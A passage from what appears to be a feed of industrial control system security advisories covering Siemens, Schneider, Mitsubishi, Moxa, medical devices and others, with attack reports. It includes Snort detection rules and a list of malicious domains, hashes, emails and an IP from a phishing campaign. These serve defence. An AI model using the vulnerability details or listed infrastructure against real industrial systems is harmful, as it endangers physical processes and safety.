-  Stack-based Buffer Overflow
-  Untrusted Pointer Dereference
-  Out-of-bounds Read

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Siemens Solid Edge

16/01/2021

Vulnerability affects :
- Solid Edge: All versions prior to SE2021MP2

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Siemens SCALANCE X Products

16/01/2021

Vulnerability affects :
- SCALANCE X-200 switch family (incl. SIPLUS NET variants): All versions
- SCALANCE X-200IRT switch family (incl. SIPLUS NET variants): All versions
- SCALANCE X-300 switch family (incl. X408 and SIPLUS NET variants): All versions prior to v4.1.0


Vulnerability risks:
- denial-of-service conditions
- buffer overflows

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Delta Electronics CNCSoft ScreenEditor

05/01/2021

Vulnerability affects :
- CNCSoft ScreenEditor Versions 1.01.26 and prior

Vulnerability risks:
- arbitrary code execution

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Delta Electronics DOPSoft

05/01/2021

Vulnerability affects :
- DOPSoft Version 4.0.8.21 and prior

Vulnerability risks:
- 

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Red Lion Crimson 3.1

05/01/2021

Vulnerability affects :
- Crimson 3.1: Build versions prior to 3119.001

Vulnerability risks:
- create a denial-of-service condition
- read and modify the database
- leak memory data

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] GE Reason RT43X Clocks

05/01/2021

Vulnerability affects :
- RT430, RT431 & RT434: All firmware versions prior to Version 08A06

Vulnerability risks:
- Code Injection
- Use of Hard-coded Cryptographic Key

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Panasonic FPWIN Pro

05/01/2021

Vulnerability affects :
- FPWIN Pro Version 7.5.0.0 and prior

Vulnerability risks:
- out-of-bounds read, which may allow remote code execution

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Schneider Electric Web Server on Modicon M340

05/01/2021

Vulnerability affects :
- M340 CPUs
    - BMX P34x, all versions
- M340 Communication Ethernet modules
    - BMX NOE 0100 (H), all versions
    - BMX NOE 0110 (H), all versions
    - BMX NOC 0401, all versions
    - BMX NOR 0200H, all versions
- Premium processors with integrated Ethernet COPRO
    - TSXP574634, TSXP575634, TSXP576634, all versions
- Premium communication modules
    - TSXETY4103, all versions
    - TSXETY5103, all versions
- Quantum processors with integrated Ethernet COPRO
    - 140CPU65xxxxx, all versions
- Quantum communication modules
    - 140NOE771x1, all versions
    - 140NOC78x00, all versions
    - 140NOC77101, all versions


Vulnerability risks:
- 

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Treck TCP/IP Stack

19/12/2020

Vulnerability affects :
- Treck TCP/IP stack Version 6.0.1.67 and prior (HTTP Server, IPv6, DHCPv6)

Vulnerability risks:
- remote code execution
- denial-of-service

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] PTC Kepware LinkMaster

18/12/2020

Vulnerability affects :
- Kepware LinkMaster Version 3.0.94.0 and prior

Vulnerability risks:
- execute arbitrary code with NT SYSTEM privileges

Patch available : 
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] PTC Kepware KEPServerEX

18/12/2020

Vulnerability affects :
- KEPServerEX: v6.0 to v6.9
- ThingWorx Kepware Server: v6.8 and v6.9
- ThingWorx Industrial Connectivity: All versions 
- OPC-Aggregator: All versions
And maybe :
- Rockwell Automation KEPServer Enterprise
- GE Digital Industrial Gateway Server: v7.68.804 and v7.66
- Software Toolbox TOP Server: All 6.x versions

Vulnerability risks:
- server crashing
- a denial-of-service condition
- data leakage
- remote code execution

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Emerson Rosemount X-STREAM

18/12/2020

Vulnerability affects :
- X-STREAM enhanced XEGP – all revisions 
- X-STREAM enhanced XEGK – all revisions 
- X-STREAM enhanced XEFD – all revisions 
- X-STREAM enhanced XEXF – all revisions


Vulnerability risks:
- download files and obtain sensitive information

Patch available : 
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Lantronix XPort EDGE

16/12/2020

Vulnerability affects :
- Web Manager functionality of Lantronix XPort :
    - Lantronix XPort EDGE 3.0.0.0R11
    - Lantronix XPort EDGE 3.1.0.0R9
    - Lantronix XPort EDGE 3.4.0.0R12
    - Lantronix XPort EDGE 4.2.0.0R7
    - Lantronix SGX 5150 8.7.0.0R1
    - Lantronix SGX 5150 8.9.0.0R4

Vulnerability risks:
- Authentication bypass
- Cleartext Transmission of Sensitive Information

Snort rules : 
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"POLICY-OTHER TRUFFLEHUNTER TALOS-2020-1135 attack attempt"; service:http; reference:cve,2020-13527; reference:url,www.talosintelligence.com/reports/TALOS-2020-1135/; classtype:policy-violation; soid:54762; gid:3; sid:54762; rev:1; )
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"POLICY-OTHER TRUFFLEHUNTER TALOS-2020-1135 attack attempt"; service:http; reference:cve,2020-13527; reference:url,www.talosintelligence.com/reports/TALOS-2020-1135/; classtype:policy-violation; soid:54763; gid:3; sid:54763; rev:1; )
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"POLICY-OTHER TRUFFLEHUNTER TALOS-2020-1135 attack attempt"; service:http; reference:cve,2020-13527; reference:url,www.talosintelligence.com/reports/TALOS-2020-1135/; classtype:policy-violation; soid:54764; gid:3; sid:54764; rev:1; )

Patch available : https://www.lantronix.com/support-latest_release_by_product-html/
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Central Licensing System Vulnerabilities, impact on Symphony® Plus, Composer Harmony, Composer Melody, Harmony OPC Server

15/12/2020

Vulnerability affects :
- ABB Central Licensing System (CLS) as used in ABB Ability™Symphony Plus Operations (3.0 to 3.3)
- ABB Central Licensing System (CLS) as used in ABB Ability™ Symphony Plus Engineering (1.0 to 2.3)
- ABB Central Licensing System (CLS) as used in Composer Harmony (5.1, 6.0, 6.1)
- ABB Central Licensing System (CLS) as used in Composer Melody(5.3, 6.1)
- ABB Central Licensing System (CLS) as used in Harmony OPC Server (6.0, 6.1, 7.0)

Vulnerability risks:
- XXE vulnerability
- Denial of Service
- Elevation of privilege vulnerability
- Weak File Permissions
- Information Disclosure

Patch available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Multiple Vulnerabilities in Symphony® Plus Historian

15/12/2020

Vulnerability affects :
- S + Historian 3.0 and 3.1

Vulnerability risks:
- SQL Injection
- Improper Authorization
- Weak Authentication
- Insecure Windows Services
- Web Application Security
- Privilege Escalation
- Denial of Service
- ImproperCredentialStorage

Patch available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Multiple Vulnerabilities in Symphony® Plus Operations

15/12/2020

Vulnerability affects :
- S+ Operations 1.1
- S+ Operations 2.0 (including allService Packs)
- S+ Operations 2.1 Service Pack 1 (SP1) (for Melody & other Heritage systems)
- S+ Operations 2.1 Service Pack 2(SP2)
- S+ Operations 3.0
- S+ Operations 3.1
- S+ Operations 3.2
- S+ Operations 3.3

Vulnerability risks:
- SQL Injection
- Improper Authorization
- Weak Authentication
- Insecure Windows Services
- Web Application Securit
- Privilege Escalation
- Denial of Service
- Improper Credential Storage
- Authentication Bypass

Patch available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Host Engineering H2-ECOM100 Module

10/12/2020

Vulnerability affects :
    - H0-ECOM100 Module:
        - Hardware Versions 6x and prior with Firmware Versions 4.0.348 and prior
        - Hardware Version 7x with Firmware Versions 4.1.113 and prior
        - Hardware Version 9x with Firmware Versions 5.0.149 and prior
    - H2-ECOM100 Module:
        - Hardware Versions 5x and prior with Firmware Versions 4.0.2148 and prior
        - Hardware Version 8x with Firmware Versions 5.0.1043 and prior
    - H4-ECOM100 Module: Firmware Versions 4.0.2148 and prior


Vulnerability risks:
- Improper Input Validation could lead a Dos 
- Improper Input Validation could forcing an operator manually restart 

Patch available
See the documents below for more information
Sources :
CVE :

10/12/2020

Vulnerability affects :
- Smart Model 25000 Patient Reader, all versions

Vulnerability risks:
- Improper Authentication
- Heap-based Buffer Overflow
- Time-of-check Time-of-use Race Condition

Patch available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Mitsubishi Electric MELSEC iQ-F Series

10/12/2020

Vulnerability affects :
- FX5U(C) CPU module: firmware Version 1.060 or earlier

Vulnerability risks:
- Improper Check or Handling of Exceptional Conditions (risk : DoS, reset CPU module)

Patch available
See the documents below for more information
CVE :

[VULNERABILITY] Multiple Vulnerabilities in Schneider Electric

08/12/2020

Vulnerability affects :
    - EcoStruxure™ Control Expert
    - Unity Pro (former name of EcoStruxure™ Control Expert)
    - EcoStruxure Geo SCADA Expert 2019 versions antérieures à 81.7613.1
    - EcoStruxure Geo SCADA Expert 2020 versions antérieures à 83.7613.1
    - Modicon M340 CPU BMXP34* versions antérieures à V3.3
    - Modicon M340 Ethernet Communication modules BMXNOC0401 versions antérieures à V2.10 (*)
    - Modicon M340 Ethernet Communication modules BMXNOE0100 versions antérieures à V3.4
    - Modicon M340 Ethernet Communication modules BMXNOE0110 versions antérieures à V6.6
    - Modicon Premium processors with integrated Ethernet COPRO TSXP574634, TSXP575634, TSXP576634
    - Modicon Quantum CPUs 140CPU65xxxxx versions antérieures à V6.1 (*)
    - Modicon Quantum communication modules 140NOE771x1 versions antérieures à V7.3 (*)
    - Modicon Quantum communication modules 140NOC78x00 versions antérieures à V1.74 (*)
    - Modicon Quantum communication modules 140NOC77101 versions antérieures à V1.08
    - Modicon Premium communication modules TSXETY4103 versions antérieures à V6.2 (*)
    - Modicon Premium communication modules TSXETY5103 versions antérieures à V6.4 (*)
    - Modicon Premium CPUs TSXP574634, TSXP575634, TSXP576634 versions antérieures à V6.1 (*)
    - BMXNOE0100
    - BMXNOE0110
    - BMXNOR0200H
    - BMXNOR200H
    - Modicon M580 CPUs BMEx58xxxxx microgiciel versions antérieures à 3.20
    - Modicon M258 versions antérieures à 5.0.4.11
    - SoMachine/SoMachine Motion software

Vulnerability risks:
    - Arbitrary code execution
    - Remote Denial of Service
    - Breach of confidentiality of data

Patch available
See the documents below for more information
Sources :
CVE :

08/12/2020

Vulnerability affects :
- LOGO! 8 BM (incl. SIPLUS variants) ; All version

Vulnerability risks:
- An attacker reading and modifying the device configuration and obtain project files from the devices if the attacker has access to port 135/tcp

Patch available
See the documents below for more information
Sources :
CVE :

08/12/2020

Vulnerability affects :
- LOGO! 8 BM (incl. SIPLUS variants) ; All versions < V8.3

Vulnerability risks:
- an attacker reading and modifying the device configuration if the attacker has accessto port 10005/tcp

Patch available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Vulnerabilities in XHQ Operations Intelligence

08/12/2020

Vulnerability affects :
- XHQ ; All Versions < 6.1

Vulnerability risks:
- data injection in the XHQ’s web interfaces

Patch available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Missing Authentication Vulnerability in SIEMENS LOGO!

08/12/2020

Vulnerability affects :
- LOGO! 8 BM (incl. SIPLUS variants) ; All versions

Vulnerability risks:
- an attacker reading and modifying the device configuration and obtain projectfiles from the devices if the attacker has access to port 135/tcp

Patch available
See the documents below for more information
Sources :
CVE :

[ATTACK] Attack on a water tank in Israel

04/11/2020

A video of an HMI of an Israeli water tank has been published. The access was initially published on the Telegram channel of an Iran-based hacker group called "Unidentified TEAM".

See the documents below for more information
Sources :

[VULNERABILITY] National Instruments CompactRIO

03/12/2020

Vulnerability affects :
- CompactRIO: Driver versions prior to 20.5     

Vulnerability risks:
- reboot the device remotely

Patch available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Schneider Electric EcoStruxure Operator Terminal Expert runtime (Vijeo XD)

02/12/2020

Vulnerability affects :
- EcoStruxure Operator Terminal Expert Runtime 3.1 Service Pack 1A and prior installed on:
    - Windows PC using legacy BIOS
    - Harmony iPC (HMIG5U, HMIG5U2) using legacy BIOS
- Windows PCs using UEFI are not impacted    

Vulnerability risks:
- unauthorized command execution (local)

Patch available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Fuji Electric V-Server Lite

24/11/2020

Vulnerability affects :
- V-Server Lite, all versions prior to 3.3.24.0

Vulnerability risks:
- Remote code Execution

Patch available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Fuji Electric V-Server Lite

24/11/2020

Vulnerability affects :
- V-Server Lite, all versions prior to 3.3.24.0

Vulnerability risks:
- Remote code Execution

Patch available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Mitsubishi Electric MELSEC iQ-R Series

19/11/2020

Vulnerability affects :
- R00/01/02CPU firmware Versions 19 and earlier
- R04/08/16/32/120(EN)CPU firmware Versions 51 and earlier
- R08/16/32/120SFCPU firmware Versions 22 and earlier
- R08/16/32/120PCPU all versions
- R08/16/32/120PSFCPU all versions
- RJ71EN71 firmware Versions 47 and earlier
- RJ71GF11-T2 firmware Versions 47 and earlier
- RJ72GF15-T2 firmware Versions 07 and earlier
- RJ71GP21-SX firmware Versions 47 and earlier
- RJ71GP21S-SX firmware Versions 47 and earlier
- RJ71C24(-R2/R4) all versions
- RJ71GN11-T2 all versions 

Vulnerability risks:
- Denial-of-service

Patch available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Johnson Controls Sensormatic Electronics American Dynamics victor Web Client

19/11/2020

Vulnerability affects :
- All versions of victor Web Client up to and including v5.6
- All versions of C•CURE Web Client up to and including v2.90

Vulnerability risks:
- Denial-of-service condition 
- Buffer overflow may allow remote code execution

Patch available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Paradox IP150

19/11/2020

Vulnerability affects :
- Paradox IP150 firmware Version 5.02.09

Vulnerability risks:
- 

Patch available
See the documents below for more information
CVE :

[VULNERABILITY] Real Time Automation EtherNet/IP

19/11/2020

Vulnerability affects :
- All versions prior to 2.28

Vulnerability risks:
- Denial-of-service condition 
- Buffer overflow may allow remote code execution

Patch available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Schneider Electric Interactive Graphical SCADA System (IGSS)

19/11/2020

Vulnerability affects :
- IGSS Definition (Def.exe) Version 14.0.0.20247 and prior

Vulnerability risks:
- Improper Restriction of Operations within the Bounds of a Memory Buffer
- Out-of-bounds Write
- Out-of-bounds Read

Patch available
See the documents below for more information
Sources :
CVE :

[ATTACK] Drovorub in industrial environnement

14/11/2020

Schneider Electric recommends taking defensive measures against Drovorub malware, which could use Q Data Radio and J Data Radio equipment for deployment in industrial systems. 

See the documents below for more information
Sources :

[VULNERABILITY] Vulnerabilities in Schneider Electric EcoStruxure Machine Expert and M221 PLC

13/11/2020

Vulnerability affects :
- EcoStruxure Machine Expert v1.0 
- Schneider Electric M221 (Firmware 1.10.2.2)

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Mitsubishi Electric MELSEC iQ-R Series

12/11/2020

Vulnerability affects :
- R00/01/02 CPU Firmware versions from 05 to 19
- R04/08/16/32/120(EN) CPU Firmware versions from 35 to 51

Vulnerability risks:
- DoS

Patch available (update firmware)
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] BD Alaris 8015 PC Unit and BD Alaris Systems Manager

12/11/2020

Vulnerability affects :
- BD Alaris PC Unit, Model 8015, Versions 9.33.1 and earlier
- BD Alaris Systems Manager, Versions 4.33 and earlier

Vulnerability risks:
- DoS

Patch available (update firmware)
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] OSIsoft PI Interface for OPC XML-DA

10/11/2020

Vulnerability affects :
- All versions of PI Interface for OPC XML-DA prior to 1.7.3.x are affected

Vulnerability risks:
- Remotely execute arbitrary code

Patch available : https://customers.osisoft.com/s/knowledgearticle?knowledgeArticleUrl=000031534
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] OSIsoft PI Vision

10/11/2020

Vulnerability affects :
- All versions prior to PI Vision 2020 are affected.

Vulnerability risks:
- Cross-site Scripting
- Incorrect Authorization

Patch available : https://customers.osisoft.com/s/knowledgearticle?knowledgeArticleUrl=000031533
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Schneider Electric PLC Simulator for EcoStruxure Control Expert

10/11/2020

Vulnerability affects :
- PLC Simulator for EcoStruxure Control Expert, all versions
- PLC Simulator for Unity Pro (former name of EcoStruxure Control Expert), all versions

Vulnerability risks:
- Denial-of-service 

Patch available : https://www.se.com/ww/en/product-range-download/548-ecostruxure%E2%84%A2-control-expert/
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] SIMATIC S7-300 CPUs and SINUMERIK Controller (Siemens)

10/11/2020

Vulnerability affects :
-  SIMATIC S7-300 CPU family (incl. related ET200CPUs and SIPLUS variants):All versions
-  SINUMERIK 840D sl:All versions

Vulnerability risks:
-  Denial-of-Service

Recommandation : Protect network access to port 102/tcp of affected devices.
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Multiple Vulnerabilities in SCALANCE W1750D (Siemens)

10/11/2020

Vulnerability affects :
-  SCALANCE W1750D all versions

Vulnerability risks:
- Bypass security restrictions
- Obtain sensitive information
- Perform unauthorized actions 
- Execute arbitrary code

Patch available : https://support.industry.siemens.com/cs/ww/en/view/109782770/
See the documents below for more information
Sources :
CVE :

[ATTACK] Industrial enterprises using RMS and TeamViewer

07/11/2020

- Target (only in Russia) : 
    - Manufacturing, 
    - Oil and gas, 
    - Metal industry
    - Engineering
    - Energy
    - Construction
    - Mining
    - Logistics
      
In summer 2019, Kaspersky ICS CERT identified a new wave of phishing emails containing various malicious attachments. The emails target companies and organizations from different sectors of the economy that are associated with industrial production in one way or another.

We reported these attacks in 2018 in an article entitled “Attacks on industrial enterprises using RMS and TeamViewer“, but recent data shows that the attackers have modified their attack techniques and that the number of enterprises facing the threat of infection is growing.
Sources :

IOCs (source : Kaspersky):

dncars.ru

info@dncars.ru

timkasprot.temp.swtest.ru

z-wavehome.ru

99da6cf54df66738a368ab4c5332bcdef3ec4198

8feb7a65505c59f5096b43a744b479a9d41736ad

ce5599239229ba3290e5ca53cf5d562d66a8cc64

ea1440202beb02cbb49b5bef1ec013c0

3b79aacdc33593e8c8f560e4ab1c02c6

1091941264757dc7e3da0a086f69e4bb

da4dff233ffbac362fee3ae08c4efa53

72f206e3a281248a3d5ca0b2c5208f5f

203e341cf850d7a05e44fafc628aeaf1

386a1594a0add346b8fbbebcf1547e77

d768a65335e6ca715ab5ceb487f6862f

f0072ea102a122ce8a20fa32b126b67f674834da

cecc17cd324c2eb4eab4e0612b7f32897b18ef9e7affad5b311661a14ac2b585

bf47ade5a50ca09793a26ade947b585032b22e9e530b4c16a8b78532d6ea755f

604be0b601380fc31e3262a544b1c54910057cf28cc83f9838d8f91ea903fb17

5461f09eba6e01b4349a31a83613987e20570d67c6dc5427327bed7208a533df

nataly@z-wavehome.ru

timkas@protonmail.com

smoollsrv@gmail.com

77.222.56.169


[VULNERABILITY] WECON PLC Editor

06/11/2020

Vulnerability affects :
- PLC Editor Versions 1.3.8 and prior

Vulnerability risks:
- execute code under the privileges of the application

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Mitsubishi Electric GT14 Model of GOT1000 Series

06/11/2020

Vulnerability affects :
- GT1455-QTBDE with CoreOS Version 05.65.00.BD and prior, a graphic operation terminal 
- GT1450-QMBDE with CoreOS Version 05.65.00.BD and prior, a graphic operation terminal
- GT1450-QLBDE with CoreOS Version 05.65.00.BD and prior, a graphic operation terminal
- GT1455HS-QTBDE with CoreOS Version 05.65.00.BD and prior, a graphic operation terminal
- GT1450HS-QMBDE with CoreOS Version 05.65.00.BD and prior, a graphic operation terminal

Vulnerability risks:
-  denial-of-service condition (DoS)
- code execution

Patch available on Mitsubishi website.
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] EDR-810 Series Security Router

03/11/2020

Vulnerability affects :
- Firmware version 5.3 and lower 
- Firmware version 5.6 and lower

Vulnerability risks:
- A crafted request to the web server caused potential risk of executing arbitrary command.
- A crafted request to the web server caused potential risk of denial-of-service.
- A crafted request to the device may cause specific parts of the user interface to become unresponsive.
- A crafted request to the device may cause specific parts of the user interface to become unresponsive.
- A crafted request to the device may cause specific parts of the user interface to become unresponsive.
- A crafted request to the device may cause specific parts of the user interface to become unresponsive


Patch available : https://www.moxa.com/en/support/product-support/software-and-documentation/search?psid=48041
See the documents below for more information
Sources :

[VULNERABILITY] MXview Series Network Management

03/11/2020

Vulnerability affects :
- Firmware Version from 3.0 to 3.1.8

Vulnerability risks:
- An attacker may be able to edit a source file to insert a malicious code to elevate their permissions

Patch available https://www.moxa.com/en/support/product-support/software-and-documentation/search?psid=53389
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] WAGO Series 750-88x and 750-352

03/11/2020

Vulnerability affects :
- All versions before FW11 of this products :
  - 750-352
  - 750-831/xxx-xxx
  - 750-852
  - 750-880/xxx-xxx
  - 750-881
  - 750-889

Vulnerability risks:
- crash the device (DoS)

Patch available : https://www.wago.com/us/requestDownload?downloadFile=FWMedia_58_750-881
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] NEXCOM NIO50

03/11/2020

Vulnerability affects :
- All versions of NEXCOM NIO 50
Vulnerability risks:
- view sensitive information 
- DoS

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Moxa EDR-G903

30/10/2020

Vulnerability affects :
- Firmware for EDR-G903 versions prior to 5.6
- Firmware for EDR-G902 versions prior to 5.6
- Firmware for EDR-810 versions prior to 5.7
Vulnerability risks:
- Improper Restriction of Operations

Patch available :
EDR-G903 Series - https://www.moxa.com/en/support/product-support/software-and-documentation/search?psid=48053
EDR-G902 Series - https://www.moxa.com/en/support/product-support/software-and-documentation/search?psid=48063
EDR-810 Series - https://www.moxa.com/en/support/product-support/software-and-documentation/search?psid=48041
See the documents below for more information
Sources :

[VULNERABILITY] JUUKO K-800 and K-808

28/10/2020

Vulnerability affects :
- JUUKO K-800 and K-808: Firmware versions prior to numbers ending ...9A, ...9B, ...9C, etc.

Vulnerability risks: 
- Authentication Bypass by Capture-replay
- Command Injection

Patch available : https://www.moxa.com/en/support/product-support/software-and-documentation/search?psid=50278
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] NPort 5100A

28/10/2020

Vulnerability affects :
- NPort 5100A versions prior to 1.6

Vulnerability risks: 
- Privileges escalations

See the documents below for more information
Sources :

[VULNERABILITY] B. Braun Melsungen AG

23/10/2020

Vulnerability affects :
-  SpaceCom, software Versions U61 and earlier (United States), L81 and earlier (outside the United States)
- Battery pack with Wi-Fi, software Versions U61 and earlier (United States), L81 and earlier (outside the United States)
- Data module compactplus, software Versions A10 and A11 (not distributed in the United States)
- AP 3.0 and earlier

Vulnerability risks: 
-  Relative Path Traversal
- Uncontrolled Search Path Element
- Improper Neutralization of Formula Elements in a CSV File
- XSS
- Open Redirect
- XPath Injection
- Session Fixation 
- Use of a One-way Hash without a Salt
- Relative Path Traversal
- Improper Verification of Cryptographic Signature
- Improper Privilege Management
- Use of Hard-coded Credentials
- Active Debug Code
- Improper Access Control

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Capsule Technologies SmartLinx Neuron 2

20/10/2020

Vulnerability affects :
- Capsule Technologies SmartLinx Neuron 2: Firmware Versions 9.0.3 and older

Vulnerability risks: 
- Protection Mechanism Failure

Patch is available (notice [here](https://us-cert.cisa.gov/ics/advisories/icsma-20-196-01)) 
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] WECON LeviStudioU

20/10/2020

Vulnerability affects :
- LeviStudioU: Version 2019-09-21 and prior

Vulnerability risks: 
- Stack-based Buffer Overflow
- Improper Restriction of XML External Entity Reference

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] XMC20 Multiservice-Multiplexer - Hitachi ABB Power Grids

20/10/2020

Vulnerability affects :
- XMC20 R4 using COGE5 versions older than co5ne_r1h07_12.esw
- XMC20 R6 using COGE5 versions older than co5ne_r2d14_03.esw


Vulnerability risks: 
- Bypass authentification (Improper Authentication)

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] 1794-AENT Flex I/O Series B Rockwell Automation

20/10/2020

Vulnerability affects :
- 1794-AENT Flex I/O, Series B, Versions 4.003 and prior

Vulnerability risks: 
- Buffer Overflow (Exploitable remotely)

See the documents below for more information
Sources :

[VULNERABILITY] WebAccess/SCADA (Advantech)

16/10/2020

Vulnerability affects :
- WebAccess/SCADA Versions 9.0 and prior

Vulnerability risks:
- Remote Code Execution

Patch available : https://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-1J6QG9J&Doc_Source=Download
See the documents below for more information
Sources :

[VULNERABILITY] R-SeeNet (Advantech)

16/10/2020

Vulnerability affects :
- R-SeeNet Versions 1.5.1 through 2.4.10

Vulnerability risks:
- SQL injection

Patch available : https://ep.advantech-bb.cz/products/software/r-seenet
See the documents below for more information
Sources :

[VULNERABILITY] Wibu-Systems CodeMeter

16/10/2020

Vulnerability affects :
- All versions prior to 7.10a are affected by CVE-2020-14509 and CVE-2020-14519
- All versions prior to 7.10a are affected by CVE-2020-14517
- All versions prior to 7.10 are affected by CVE-2020-16233
- All versions prior to 6.81 are affected by CVE-2020-14513 
- All versions prior to 6.90 are affected by CVE-2020-14515 when using -CmActLicense update files with CmActLicense Firm Code

Vulnerability risks:
- Buffer Access with Incorrect Length Value
- Inadequate Encryption Strength
- Origin Validation Error
- Improper Input Validation
- Improper Verification of Cryptographic Signature
- Improper Resource Shutdown or Release

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Allen-Bradley Flex I/O

14/10/2020

Vulnerability affects :
- Allen-Bradley Flex I/O

Vulnerability risks:
- DoS

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Schneider Electric

14/10/2020

Vulnerability affects :
- Modicon M241 and M251 Logic Controller firmware versions prior to 5.0.8.4
- Modicon Quantum Co-processors ref. 140CPU6
- Modicon Premium Co-processors ref TSXP and TSXH
- Modicon Quantum Ethernet communication modules ref.140NOE and 140NOC
- Modicon Premium Ethernet communication modules ref. TSXETY
- Modicon M340 CPU ref BMXP34
- Modicon M340 Ethernet communication Modules ref. BMXNOC, BMXNOE, BMXNOR
- Modicon Momentum Ethernet MDI
- ATV340E Altivar Machine Drives 3.1IE23 and earlier versions
- ATV6000 Medium Voltage AltivarProcess Drives 1.1IE02 and earlier versions
- ATV630/650/660/680/6A0/6B0 Altivar Process Drives 2.6IE31 and earlier versions
- ATV930/950/960/980/9A0/9B0 Altivar Process Drives 3.1IE24 and earlier versions
- SCADAPack 32 RTUsAll versions 2.24 and earlier
- TM3BC bus coupler module EIP, SL and CANOpen all versions
- VW3A3720, VW3A3721 Altivar ProcessCommunication Modules 1.15IE18 and earlier versions
- ZBRCETH Modbus TCP communication module for ZBRN1 Harmony Hub 02.03 and earlier versions
- XUPH001 OsSense communication module all versions
- XGCS850C201 OsiSense RFID compact smart antenna all versions
- ACE850 Sepam communication interface all versions
- Acti9 PowerTag Link C and Link HD all versions
- Acti9 Smartlink IP, Acti9 Smartlink EL B and EL D, Acti9 Smartlink SI B and SI D all versions
- EcoStruxure Building SmartX IP MP and IP RP Controllers all versions
- Andover Continuum controller (NetController 1 (NC1) = model CX9900, NetController 2 (NC2) = model CX9680, ACX2 = models ACX5720 and ACX5740, series CX9200, series CX9400, CX9924, CX9702, series BCX4040, series BCX9640) all versions
- PowerLogic EGX300 Ethernet Gateway all versions
- EGX150/Link150 Ethernet Gateway all versions
- eIFE Ethernet Interface for circuit breakers MasterPact MTZ drawout all versions
- IFE Ethernet Interface for ComPact, PowerPact, and MasterPact circuit breakers all versions
- IFE Gateway all versions
- PowerLogic PM5000 series measuring station all versions
- TeSys T LTMR08EBD Motor Controller all versions
- Smart-UPS and Symmetra UPS Network Management Card 1 (NMC1) SmartSlot (models AP9617 (end of support Nov 2011), AP9619 (end of support Sep 2012), AP9618 (end of support Jan 2017), Audio/Video Network Management Enabled products (S20BLK, G50NETB2, G50NETB-20A2)) AOS 3.9.2 and earlier versions
- Network Management Card 3 (NMC3) SmartSlot (models AP9640/AP9640J, AP9641/AP9641J) AOS 1.3.0.6 and earlier versions
- Embedded NMC1 (Metered/Switched Rack PDUs with embedded NMC1, AP78XX, AP79XX) AOS 3.9.2 and earlier versions
- Embedded NMC2 (2G Metered/Switched Rack PDUs with embedded NMC2, AP84XX, AP86XX, AP88XX, AP89XX)
- AOS 6.8.8 and earlier versions
- Embedded NMC1 (Battery Management System, AP9921X, Rack Automatic Transfer Switches, AP77XX, AP9320, AP9340, AP9361, NetBotz NBRK0200, NetworkAir, InRow) AOS 3.9.2 and previous versions
- Embedded NMC2 (Battery Manager, AP9922, Rack Automatic Transfer Switches, AP44XX, NetBotz NBRK0250) AOS 6.8.8 and older
- Wiser Energy IP module by Schneider Electric (EER31800) all versions
- Wiser Energy IP module by Clipsal (EER72600) all versions
- Gateway Connector by Elko (EKO01827) all versions
- EcoStruxure™Power Monitoring Expert versions 7.x, 8.x and 9.0
- EcoStruxure™Energy Expert version 2.0
- Power Manager versions 1.1, 1.2 and 1.3
- StruxureWare™ PowerSCADA Expert with Advanced Reporting and Dashboards Module versions 8.x
- EcoStruxure™Power SCADA Operation with Advanced Reporting and Dashboards Module version 9.0
- Acti9 Smartlink SI D and SI B 002.004.002 and earlier versions
- Acti9 PowerTag Link / Link HD 001.008.007 and earlier versions
- Acti9 Smartlink EL B 1.2.1 and earlier versions
- Wiser Link 1.5.0 and previous versions
- Wiser Energy 1.5.0 and previous versions
- EcoStruxure Machine Expert (previously SoMachine and SoMachine Motion) all versions
- E+PLC400, E+PLC100 and E+PLC_Setup all versions
- EcoStruxure Expert SCADA Machine all versions
- M340 CPUs (BMX P34x) firmware versions prior to 3.20
